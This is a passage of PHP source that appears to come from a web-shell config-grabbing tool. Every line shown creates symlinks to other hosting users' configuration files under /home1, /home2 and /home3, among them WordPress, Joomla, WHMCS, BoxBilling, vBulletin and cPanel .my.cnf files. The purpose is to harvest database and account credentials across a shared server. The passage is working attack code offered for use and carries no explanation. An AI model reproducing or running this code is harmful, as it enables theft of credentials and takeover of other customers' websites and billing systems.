  1061. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1062. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1063. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1064. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1065. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1066. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1067. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1068. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1069. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1070. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1071. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1072. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1073. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1074. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1075. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1076. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1077. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1078. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1079. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1080. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1081. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1082. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1083. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1084. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1085. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1086. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1087. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1088. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1089. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1090. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1091. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1092. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1093. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1094. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1095. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1096. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1097. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1098. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1099. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1100. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1101. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1102. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1103. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1104. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1105. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1106. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1107. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1108. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1109. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1110. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1111. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1112. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1113. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1114. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1115. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1116. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1117. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1118. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1119. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1120. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1121. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1122. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1123. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1124. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1125. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1126. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1127. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1128. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1129. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1130. @symlink('/home1/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1131. @symlink('/home1/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1132. //Home2
  1133.  
  1134. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1135. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1136. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1137. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1138. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1139. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1140. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1141. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1142. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1143. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1144. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1145. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1146. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1147. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1148. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1149. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1150. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1151. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1152. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1153. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1154. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1155. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1156. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1157. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1158. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1159. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1160. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1161. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1162. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1163. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1164. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1165. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1166. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1167. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1168. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1169. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1170. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1171. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1172. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1173. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1174. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1175. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1176. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1177. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1178. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1179. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1180. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1181. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1182. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1183. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1184. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1185. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1186. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1187. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1188. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1189. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1190. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1191. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1192. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1193. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1194. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1195. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1196. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1197. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1198. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1199. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1200. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1201. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1202. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1203. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1204. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1205. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1206. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1207. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1208. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1209. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1210. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1211. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1212. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1213. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1214. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1215. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1216. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1217. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1218. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1219. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1220. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1221. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1222. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1223. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1224. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1225. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1226. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1227. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1228. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1229. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1230. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1231. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1232. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1233. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1234. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1235. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1236. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1237. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1238. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1239. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1240. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1241. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1242. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1243. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1244. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1245. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1246. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1247. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1248. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1249. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1250. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1251. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1252. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1253. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1254. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1255. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1256. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1257. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1258. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1259. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1260. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1261. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1262. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1263. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1264. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1265. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1266. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1267. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1268. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1269. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1270. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1271. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1272. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1273. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1274. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1275. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1276. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1277. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1278. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1279. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1280. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1281. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1282. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1283. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1284. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1285. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1286. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1287. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1288. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1289. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1290. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1291. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1292. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1293. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1294. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1295. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1296. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1297. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1298. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1299. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1300. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1301. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1302. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1303. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1304. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1305. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1306. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1307. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1308. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1309. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1310. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1311. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1312. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1313. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1314. @symlink('/home2/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1315. @symlink('/home2/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1316. //Home3
  1317.  
  1318. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1319. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1320. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1321. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1322. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1323. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1324. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1325. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1326. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1327. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1328. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1329. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1330. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1331. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1332. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1333. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1334. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1335. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1336. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1337. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1338. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1339. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1340. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1341. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1342. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1343. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1344. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1345. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1346. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1347. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1348. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1349. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1350. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1351. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1352. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1353. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1354. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1355. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1356. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1357. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1358. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1359. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1360. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1361. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1362. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1363. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1364. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
